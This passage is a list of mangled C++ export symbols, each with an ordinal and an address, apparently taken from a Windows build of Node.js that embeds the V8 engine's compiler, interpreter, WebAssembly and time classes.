                                  ??4Value@v8@@QEAAAEAV01@AEBV01@@Z19940x1400769f0
                                  ??4ValueNumberingReducer@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z19950x140e7b740
                                  ??4Version@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19960x1400769f0
                                  ??4Version@internal@v8@@QEAAAEAV012@AEBV012@@Z19970x1400769f0
                                  ??4VoidDescriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19980x140077990
                                  ??4VoidDescriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z19990x140077990
                                  ??4WasmCompilationUnit@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20000x140519b20
                                  ??4WasmCompilationUnit@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20010x140076a30
                                  ??4WasmDebugSymbols@wasm@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z20020x1404209f0
                                  ??4WasmDebugSymbols@wasm@internal@v8@@QEAAAEAU0123@AEBU0123@@Z20030x140420540
                                  ??4WasmError@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20040x140519b40
                                  ??4WasmError@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20050x140519b70
                                  ??4WasmFunctionBuilder@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20060x14052d8d0
                                  ??4WasmFunctionBuilder@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20070x14052daf0
                                  ??4WasmModuleBuilder@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20080x14052dcb0
                                  ??4WasmModuleBuilder@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20090x14052e0e0
                                  ??4WasmModuleObject@v8@@QEAAAEAV01@$$QEAV01@@Z20100x1400769f0
                                  ??4WasmModuleObject@v8@@QEAAAEAV01@AEBV01@@Z20110x1400769f0
                                  ??4WasmModuleObjectBuilderStreaming@v8@@AEAAAEAV01@$$QEAV01@@Z20120x140077500
                                  ??4WasmModuleSourceMap@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20130x140420a00
                                  ??4WasmModuleSourceMap@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20140x140420aa0
                                  ??4WasmOpcodes@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20150x1400769f0
                                  ??4WasmOpcodes@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20160x1400769f0
                                  ??4WasmSerializer@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20170x140519bb0
                                  ??4WasmSerializer@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20180x140519c60
                                  ??4WasmTableObject@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20190x140076a30
                                  ??4WasmTableObject@internal@v8@@QEAAAEAV012@AEBV012@@Z20200x140076a30
                                  ??4WasmValue@debug@v8@@QEAAAEAV012@$$QEAV012@@Z20210x1400769f0
                                  ??4WasmValue@debug@v8@@QEAAAEAV012@AEBV012@@Z20220x1400769f0
                                  ??4Zone@internal@v8@@QEAAAEAV012@AEBV012@@Z20230x1404208c0
                                  ??4iterator@JumpTableTargetOffsets@interpreter@internal@v8@@QEAAAEAV01234@$$QEAV01234@@Z20240x140677910
                                  ??4iterator@JumpTableTargetOffsets@interpreter@internal@v8@@QEAAAEAV01234@AEBV01234@@Z20250x1400778e0
                                  ??4iterator@StateValuesAccess@compiler@internal@v8@@QEAAAEAV01234@$$QEAV01234@@Z20260x140e34560
                                  ??4iterator@StateValuesAccess@compiler@internal@v8@@QEAAAEAV01234@AEBV01234@@Z20270x140e34620
                                  ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@F@Z20280x1404580a0
                                  ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z20290x1400c0410
                                  ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z20300x1400c05f0
                                  ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@I@Z20310x140458290
                                  ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@J@Z20320x140458470
                                  ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z20330x140139f50
                                  ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z20340x140458650
                                  ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@N@Z20350x14013a130
                                  ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@O@Z20360x140458830
                                  ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z20370x140458a10
                                  ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV?$basic_ios@DU?$char_traits@D@std@@@1@AEAV21@@Z@Z20380x140458a20
                                  ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z20390x140458a20
                                  ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z20400x140458a40
                                  ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@PEBX@Z20410x14056cce0
                                  ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_J@Z20420x14013a320
                                  ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z20430x1400c07d0
                                  ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z20440x140458ca0
                                  ??6base@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@AEBVTime@01@@Z20450x140dc2e10
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBUAsRPO@012@@Z20460x140ecb4e0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBUConstFieldInfo@012@@Z20470x140ebb070
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBUElementAccess@012@@Z20480x140ebb0c0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBUFeedbackSource@012@@Z20490x140ea2ac0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBUFieldAccess@012@@Z20500x140ebb1d0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBUGraphAsJSON@012@@Z20510x140ecbdb0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBUObjectAccess@012@@Z20520x140ebb3c0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVCheckMinusZeroParameters@012@@Z20530x140ebb410
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVContextAccess@012@@Z20540x140eabc10
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVFastApiCallParameters@012@@Z20550x140ebb470
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVIfValueParameters@012@@Z20560x140e08ea0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVInstructionSequence@012@@Z20570x140e00f00
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVMoveOperands@012@@Z20580x140e015b0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVNumberOperationParameters@012@@Z20590x140ebb4b0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVOperator@012@@Z20600x140ea3830
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVPropertyAccess@012@@Z20610x140eabdc0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVS8x16ShuffleParameter@012@@Z20620x140e0d6e0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVSchedule@012@@Z20630x140e41510
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4AddressingMode@012@@Z20640x140e01620
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4ArchOpcode@012@@Z20650x140e017e0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4FlagsCondition@012@@Z20660x140e03df0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4FlagsMode@012@@Z20670x140e04010
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4Kind@CallDescriptor@012@@Z20680x140e672f0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@UBranchOperatorInfo@012@@Z20690x140e09280
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@ULoadTransformParameters@012@@Z20700x140e0d8b0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@VAllocateParameters@012@@Z20710x140ebb4f0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@VStackSlotRepresentation@012@@Z20720x140e0d940
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@VStoreRepresentation@012@@Z20730x140e0d970
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@VType@012@@Z20740x140e2eb30
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4BigIntOperationHint@012@@Z20750x140ebb530
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4BranchHint@012@@Z20760x140e09330
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4CheckForMinusZeroMode@012@@Z20770x140ebb560
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4CheckTaggedInputMode@012@@Z20780x140ebb5a0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4IsSafetyCheck@012@@Z20790x140e09390
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4LoadKind@012@@Z20800x140e0da50
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4LoadTransformation@012@@Z20810x140e0daa0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4NumberOperationHint@012@@Z20820x140ebb5e0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4ShiftKind@012@@Z20830x140e0dba0
                                  ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4Value@IrOpcode@012@@Z20840x140ff1e00
                                  ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@AEBUAsEscapedUC16ForJSON@01@@Z20850x1405f2830
                                  ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@AEBUAsHex@01@@Z20860x1405f2900
                                  ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@AEBUAsHexBytes@01@@Z20870x1405f2980
                                  ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@AEBUBrief@01@@Z20880x140769da0
                                  ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@AEBVBasicBlockProfiler@01@@Z20890x1409a9ce0
                                  ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@AEBVObject@01@@Z20900x14076a010
                                  ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@AEBW4PropertyAttributes@01@@Z20910x14075a060
                                  ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@VBailoutId@01@@Z20920x1405f1ae0
                                  ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@VExternalReference@01@@Z20930x1409e9770
                                  ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@VFeedbackSlot@01@@Z20940x1405f1af0
                                  ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@VMachineType@01@@Z20950x1409dd020
                                  ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4DeoptimizeReason@01@@Z20960x1409b75c0
                                  ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4FeedbackSlotKind@01@@Z20970x1407f5160
                                  ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4FunctionId@Runtime@01@@Z20980x1406137f0
                                  ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4InstanceType@01@@Z20990x14076a040
                                  ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4MachineRepresentation@01@@Z21000x1409dd0a0
                                  ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4PropertyConstness@01@@Z21010x14075a100
                                  ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVBytecodeNode@012@@Z21020x140872750
                                  ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVBytecodeSourceInfo@012@@Z21030x140870520
                                  ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4AccumulatorUse@012@@Z21040x140871b10
                                  ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4Bytecode@012@@Z21050x14086f330
                                  ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4OperandScale@012@@Z21060x140871b80
                                  ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4OperandSize@012@@Z21070x140871be0
                                  ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4OperandType@012@@Z21080x140871c50
                                  ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4ToBooleanMode@BytecodeArrayBuilder@012@@Z21090x14088f1b0
                                  ??8?$MagicNumbersForDivision@I@base@v8@@QEBA_NAEBU012@@Z21100x141047400
                                  ??8?$MagicNumbersForDivision@_K@base@v8@@QEBA_NAEBU012@@Z21110x141047420
                                  ??8?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA_NVThreadTicks@23@@Z21120x140458e90
                                  ??8?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA_NVTime@23@@Z21130x140458e90
                                  ??8?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA_NVTimeTicks@23@@Z21140x140458e90
                                  ??8BytecodeNode@interpreter@internal@v8@@QEBA_NAEBV0123@@Z21150x140872770
                                  ??8CallInterfaceDescriptor@internal@v8@@QEBA_NAEBV012@@Z21160x140458e80
                                  ??8Register@interpreter@internal@v8@@QEBA_NAEBV0123@@Z21170x140420b10
                                  ??8TimeDelta@base@v8@@QEBA_NAEBV012@@Z21180x140453890
                                  ??8Type@compiler@internal@v8@@QEBA_NV0123@@Z21190x140458e90
                                  ??8compiler@internal@v8@@YA_NAEBUConstFieldInfo@012@0@Z21200x140453890
                                  ??8compiler@internal@v8@@YA_NAEBUElementAccess@012@0@Z21210x140ebb7b0
                                  ??8compiler@internal@v8@@YA_NAEBUFieldAccess@012@0@Z21220x140ebb7e0
                                  ??8compiler@internal@v8@@YA_NAEBUObjectAccess@012@0@Z21230x140ebb830
                                  ??8compiler@internal@v8@@YA_NAEBVIfValueParameters@012@0@Z21240x140e093f0
                                  ??8compiler@internal@v8@@YA_NAEBVS8x16ShuffleParameter@012@0@Z21250x140e0dbd0
                                  ??8compiler@internal@v8@@YA_NVStackSlotRepresentation@012@0@Z21260x140e0dbf0
                                  ??8compiler@internal@v8@@YA_NVStoreRepresentation@012@0@Z21270x140e0dc10
                                  ??8internal@v8@@YA_NVExternalReference@01@0@Z21280x1409e9920
                                  ??9?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA_NVThreadTicks@23@@Z21290x140458ea0
                                  ??9?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA_NVTime@23@@Z21300x140458ea0
                                  ??9?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA_NVTimeTicks@23@@Z21310x140458ea0
                                  ??9BytecodeNode@interpreter@internal@v8@@QEBA_NAEBV0123@@Z21320x1408727c0
                                  ??9Register@interpreter@internal@v8@@QEBA_NAEBV0123@@Z21330x140420b20
                                  ??9TimeDelta@base@v8@@QEBA_NAEBV012@@Z21340x14085dd50
                                  ??9Type@compiler@internal@v8@@QEBA_NV0123@@Z21350x140458ea0
                                  ??9iterator@JumpTableTargetOffsets@interpreter@internal@v8@@QEAA_NAEBV01234@@Z21360x14089a8c0
                                  ??9iterator@StateValuesAccess@compiler@internal@v8@@QEBA_NAEBV01234@@Z21370x140ea7bd0
                                  ??A?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAAAEAPEAVMoveOperands@compiler@internal@v8@@_K@Z21380x140453060
                                  ??A?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEBAAEBQEAVMoveOperands@compiler@internal@v8@@_K@Z21390x140453060
                                  ??A?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAAAEAUCpuProfileDeoptFrame@v8@@_K@Z21400x140079640
                                  ??A?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEBAAEBUCpuProfileDeoptFrame@v8@@_K@Z21410x140079640
                                  ??A?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAAAEAUCpuProfileDeoptInfo@v8@@_K@Z21420x140078300
                                  ??A?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEBAAEBUCpuProfileDeoptInfo@v8@@_K@Z21430x140078300
                                  ??AInputs@Node@compiler@internal@v8@@QEBAPEAV1234@H@Z21440x140458eb0
                                  ??AModificationScope@WasmImportWrapperCache@wasm@internal@v8@@QEAAAEAPEAVWasmCode@234@AEBU?$pair@W4WasmImportCallKind@compiler@internal@v8@@PEBV?$Signature@VValueType@wasm@internal@v8@@@34@@std@@@Z21450x140559160
                                  ??AWasmImportWrapperCache@wasm@internal@v8@@QEAAAEAPEAVWasmCode@123@AEBU?$pair@W4WasmImportCallKind@compiler@internal@v8@@PEBV?$Signature@VValueType@wasm@internal@v8@@@34@@std@@@Z21460x140559190
                                  ??DTimeDelta@base@v8@@QEBA?AV012@_J@Z21470x140dbf950
                                  ??DUtf8Value@String@v8@@QEAAPEADXZ21480x1400769d0
                                  ??DUtf8Value@String@v8@@QEBAPEBDXZ21490x1400769d0
                                  ??DValue@String@v8@@QEAAPEAGXZ21500x1400769d0
                                  ??DValue@String@v8@@QEBAPEBGXZ21510x1400769d0
                                  ??Diterator@JumpTableTargetOffsets@interpreter@internal@v8@@QEAA?AUJumpTableTargetOffset@234@XZ21520x14089a8d0
                                  ??Diterator@StateValuesAccess@compiler@internal@v8@@QEAA?AUTypedNode@1234@XZ21530x140ea7c10
                                  ??EBytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAAEAV0123@XZ21540x140889fa0
                                  ??Eiterator@JumpTableTargetOffsets@interpreter@internal@v8@@QEAAAEAV01234@XZ21550x14089a8f0
                                  ??Eiterator@StateValuesAccess@compiler@internal@v8@@QEAAAEAV01234@XZ21560x140ea7cb0
                                  ??FBytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAAEAV0123@XZ21570x140889ff0
                                  ??G?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA?AVThreadTicks@23@VTimeDelta@23@@Z21580x140dbf960
                                  ??G?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA?AVTimeDelta@23@VThreadTicks@23@@Z21590x140dbf990
                                  ??G?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA?AVTime@23@VTimeDelta@23@@Z21600x140dbf960
                                  ??G?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA?AVTimeDelta@23@VTime@23@@Z21610x140dbf990
                                  ??G?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA?AVTimeDelta@23@VTimeTicks@23@@Z21620x140dbf990
                                  ??G?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA?AVTimeTicks@23@VTimeDelta@23@@Z21630x140dbf960
                                  ??GTimeDelta@base@v8@@QEBA?AV012@AEBV012@@Z21640x140dbf9a0
                                  ??GTimeDelta@base@v8@@QEBA?AV012@XZ21650x140dbf9b0
                                  ??H?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA?AVThreadTicks@23@VTimeDelta@23@@Z21660x140dbf9c0
                                  ??H?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA?AVTime@23@VTimeDelta@23@@Z21670x140dbf9c0
                                  ??H?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA?AVTimeTicks@23@VTimeDelta@23@@Z21680x140dbf9c0
                                  ??HTimeDelta@base@v8@@QEBA?AV012@AEBV012@@Z21690x140dbf9e0
                                  ??KTimeDelta@base@v8@@QEBA?AV012@_J@Z21700x140dbf9f0
                                  ??KTimeDelta@base@v8@@QEBA_JAEBV012@@Z21710x140dbfa10
                                  ??M?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA_NVThreadTicks@23@@Z21720x140dbfa20
                                  ??M?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA_NVTime@23@@Z21730x140dbfa20
                                  ??M?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA_NVTimeTicks@23@@Z21740x140dbfa20
                                  ??MRegister@interpreter@internal@v8@@QEBA_NAEBV0123@@Z21750x140420b30
                                  ??MTimeDelta@base@v8@@QEBA_NAEBV012@@Z21760x140dbfa30
                                  ??N?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA_NVThreadTicks@23@@Z21770x140dbfa40
                                  ??N?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA_NVTime@23@@Z21780x140dbfa40
                                  ??N?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA_NVTimeTicks@23@@Z21790x140dbfa40
                                  ??NRegister@interpreter@internal@v8@@QEBA_NAEBV0123@@Z21800x140420b40
                                  ??NTimeDelta@base@v8@@QEBA_NAEBV012@@Z21810x140dbfa50
                                  ??O?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA_NVThreadTicks@23@@Z21820x140dbfa60
                                  ??O?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA_NVTime@23@@Z21830x140dbfa60
                                  ??O?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA_NVTimeTicks@23@@Z21840x140dbfa60
                                  ??ORegister@interpreter@internal@v8@@QEBA_NAEBV0123@@Z21850x140420b50
                                  ??OTimeDelta@base@v8@@QEBA_NAEBV012@@Z21860x140dbfa70
                                  ??P?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA_NVThreadTicks@23@@Z21870x140dbfa80
                                  ??P?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA_NVTime@23@@Z21880x140dbfa80
                                  ??P?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA_NVTimeTicks@23@@Z21890x140dbfa80
                                  ??PRegister@interpreter@internal@v8@@QEBA_NAEBV0123@@Z21900x140420b60
                                  ??PTimeDelta@base@v8@@QEBA_NAEBV012@@Z21910x140dbfa90
                                  ??RAstRawStringComparer@SourceTextModuleDescriptor@internal@v8@@QEBA_NPEBVAstRawString@23@0@Z21920x140a5a1c0
                                  ??RDeleteACHHandle@node@@QEBAXPEAUACHHandle@1@@Z21930x140245fb0
                                  ??RInterpretedFrameDeleter@wasm@internal@v8@@QEAAXPEAVInterpretedFrame@123@@Z21940x140542280
                                  ??XTimeDelta@base@v8@@QEAAAEAV012@_J@Z21950x140dbfaa0
                                  ??Y?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEAAAEAVThreadTicks@23@VTimeDelta@23@@Z21960x140dbfab0
                                  ??Y?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEAAAEAVTime@23@VTimeDelta@23@@Z21970x140dbfab0
                                  ??Y?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEAAAEAVTimeTicks@23@VTimeDelta@23@@Z21980x140dbfab0
                                  ??YBytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAAEAV0123@H@Z21990x14088a040
                                  ??YTimeDelta@base@v8@@QEAAAEAV012@AEBV012@@Z22000x140dbfae0
                                  ??Z?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEAAAEAVThreadTicks@23@VTimeDelta@23@@Z22010x140dbfaf0
                                  ??Z?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEAAAEAVTime@23@VTimeDelta@23@@Z22020x140dbfaf0
                                  ??Z?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEAAAEAVTimeTicks@23@VTimeDelta@23@@Z22030x140dbfaf0
                                  ??ZBytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAAEAV0123@H@Z22040x14088a080
                                  ??ZTimeDelta@base@v8@@QEAAAEAV012@AEBV012@@Z22050x140dbfb20
                                  ??_0TimeDelta@base@v8@@QEAAAEAV012@_J@Z22060x140dbfb30
                                  ??_7?$basic_ios@DU?$char_traits@D@std@@@std@@6B@22070x1418f6780
                                  ??_7?$basic_ostream@DU?$char_traits@D@std@@@std@@6B@22080x1418f6790
                                  ??_7?$basic_streambuf@DU?$char_traits@D@std@@@std@@6B@22090x1418f6680
                                  ??_7AbstractBytecodeArray@interpreter@internal@v8@@6B@22100x141464c68
                                  ??_7AccountingAllocator@internal@v8@@6B@22110x141440e10
                                  ??_7ActivityControl@v8@@6B@22120x141a02520
                                  ??_7AddTypeAssertionsReducer@compiler@internal@v8@@6B@22130x1418edc38
                                  ??_7AllocationProfile@v8@@6B@22140x141a022a0
                                  ??_7Allocator@ArrayBuffer@v8@@6B@22150x141a023b0
                                  ??_7ArrayBufferAllocator@node@@6B@22160x141a024e0
                                  ??_7AsmCallableType@wasm@internal@v8@@6B@22170x1414da258
                                  ??_7AsmFunctionType@wasm@internal@v8@@6B@22180x1414da288
                                  ??_7AsmOverloadedFunctionType@wasm@internal@v8@@6B@22190x1414da2b8
                                  ??_7Assembler@internal@v8@@6B@22200x141444c30
                                  ??_7AssemblerBase@internal@v8@@6B@22210x1414cdc08
                                  ??_7AsyncResource@node@@6B@22220x1413aaa58
                                  ??_7BigIntToI32PairDescriptor@internal@v8@@6B@22230x1414445b8
                                  ??_7BigIntToI64Descriptor@internal@v8@@6B@22240x1414445a0
                                  ??_7BlockBuilder@interpreter@internal@v8@@6B@22250x141496f28
                                  ??_7BoundedPageAllocator@base@v8@@6B@22260x1418dcaf0
                                  ??_7BranchElimination@compiler@internal@v8@@6B@22270x1418e89d0
                                  ??_7BreakableControlFlowBuilder@interpreter@internal@v8@@6B@22280x141496f20
                                  ??_7BytecodeIterator@wasm@internal@v8@@6B@22290x141448f30
